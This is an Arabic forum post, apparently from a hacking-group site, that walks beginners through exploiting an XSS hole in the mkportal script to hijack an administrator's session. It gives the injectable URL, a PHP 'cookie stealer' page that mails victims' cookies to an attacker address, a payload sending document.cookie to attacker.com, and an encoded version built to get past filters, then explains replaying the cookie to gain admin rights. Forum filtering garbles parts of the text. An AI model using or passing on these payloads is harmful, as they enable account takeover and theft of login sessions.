بسم الله الرحمن الرحيم
كثير من المبتدئين مثلي يسالوا عن xss ولقيت موضوع نقلته لكم عساني افهم الطريقة واتفهمون انتم وتشرحو لي ولبقية الاخوة ..
لذا حبيت اشرح هذا الدرس المتواضع عشان الكل ياخذ خلفية عنها رغم ان موضوعها قديم
بس انا قلت لما اضيف شى جديد فيها ان شاء الله الدرس يعجب الجميع
اولا : خلونا نأخذ مثال عملى لثغرة xss ونطبق عملى عشان الموضوع يصبح مفهوم للكل
ثغرتنا هتكون للاسكربت المشهور جدا وهو mkportal
الثغرة تجدوها على هذا الرابط
http://www.securityfocus.com/archive/1/447195
يلا نبدأ التفسير نقطة نقطة:
اولا :
لو شوفنا فى الثغره سنجد الاتى:
كود:
//target.com/mkportal/include/pmpopup.php?m1=<sc ript>*****(documen.xxxxi e)</XXXXXX>
هذا الرابط ايش فايدته؟
طبعا وظيفته توليد كود جافا اسكربتXXXXXXXXXX
لكن الجاف اسكربت محتاجه انه يكون معانا موقع لينا يخصنا عشان نقدر نستغل هذه الثغره
مثال:
كود:
//attacker.com/xxxxxxstealer.php?xxxxi e=thexxxxxxvalue
من اللنك اللى فوق شايفين cooakiestealer.php
شز هذا
هو عبارة عن صفحة php عادية جدا راح نستخدمها عشان سرقة الXXXXز
طيب شو هو الXXXXز
هو عبارة عن ملفات الارتباط التى تربط دخولك باى موقع تدخله
مثلا لما تسجل فى منتدى راح تجد انك لما تدخل مره اخرى راح تجد بياناتك محفوظه
طب شو السبب؟ طبعا السبب لان ملف الXXXXز موجود فى جهازك وحافظ بيانات دخولك
من هنا ياتى اهمية xss فى سرقة الXXXXز
بمعنى اصح سرقة بيانات الدخول
طب نعود لموضوع coakie stealer.php
كيف نسوى هذه الصفحة
كود PHP:
<?
mail("theattacker@hotmail.com","coakie monster",$_REQUEST***91;'xxxxxx'***93
;
;
?>
<html>
******************.XXXXXXXX='http://www.somesite.com/'</XXXXXX>
</html>
هذا ثال بسيط لصفحة لسرقة الXXXXز
طبعا قلنا اهميتها هى سرقة الXXXXز
يعنى تقرا محتويات الXXXXز وترسله على الايميل اللى انت حددته
الحين احنا عاوزين نوقع ضحيتنا فى الفخ
شو هو الفخ؟
انه نرسله رابط بمجرد الضغط عليه راح يسرق ملف الXXXXز الخاص به ويجى على ايميلنا
طيب شوف اول شى كنت كاتبه وهو
كود PHP:
//target.com/mkportal/include/pmpopup.php?m1=***************(********.coakie)</XXXXXX>
راح نستبدل بعد علامة = بالاتى:
كود PHP:
//target.com/mkportal/include/pmpopup.php?m1=******************.XXXXXXXX=
'http://attacker.com/coakiestealer.php?
coakie='+escape(********.coakie)</XXXXXX>
طب شو هذا ؟
عبارة عن كود جاف اضفناه عشان يقدر يسرق الXXXXز
طب فيه مشكلة؟
هذه الطريقه ما تصير لان فيه عملية فلتره تقوم بمنع اكواد الجافا
طب شو الحل؟
الحل هو التشفير لتجنب هذه المشكلة:
طبعا افضل تشفير لحد الحين جيد هو اليو***ود
الحين روح لهذا الرابط الل راح يشفر لنا رابطنا:
http://www.mikezilla.com/exp0012.html
بعدين حط الرابط وراح يتشفر باليو***ود ويصبح كالاتى:
كود PHP:
//target.com/mkportal/include/pmpopup.php?m1=%3C%73%63%72%69%70%74%3E%65%76%61%
6C%28%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%53%74%72%69%6E%67%2E%66%72%6F%
6D%43%68%61%72%43%6F%64%65%28%20%31%30%34%2C%31%31%36%2C%31%31%36%2C%31%31%32%
2C%35%38%2C%34%37%2C%34%37%2C%31%31%39%2C%31%31%39%2C%31%31%39%2C%34%36%2C%31%
31%39%2C%35%32%2C%39%39%2C%31%30%37%2C%34%39%2C%31%31%30%2C%31%30%33%20%2C%34%
36%2C%39%39%2C%31%31%31%2C%31%30%39%29%29%3B%3C%2F%73%63%72%69%70%74%3E
اوكى الحين كل شى تمام
كل اللى عيك انه تبعث الرابط للادمن: بشرط
انه يكون الاسكربت مصاب
انه ما يكون فيه ترقيع لثغرات الxss
ورا تجد ان الXXXXز وبياناته راح توصلك على الايميل
طب كيف هستغل الXXXXز عشا اطلع البيانات
راح نستخدم محرر الXXXXز:
وبعد استبدال الXXXXز
سوى refres hللصفحة
وبقدرة قادر راح تصبح من عضو عادى الى ادمن
ملحوظه: كلمة xxxxi e انا غيرتها عشان التشفير
أتمنى انه يكون الموضوع بسيط واى استفسار انا مش موجود خخخخخخخ والله بصراحة احاول اتقن الدرس عندها مرحبا باستفساراتكم
| روابط هذه التدوينة قابلة للنسخ واللصق | |
| URL | |
| HTML | |
| BBCode | |
شاهد ايضا اخر مواضيع الجيش العرقي الالكتروني
kamindoz
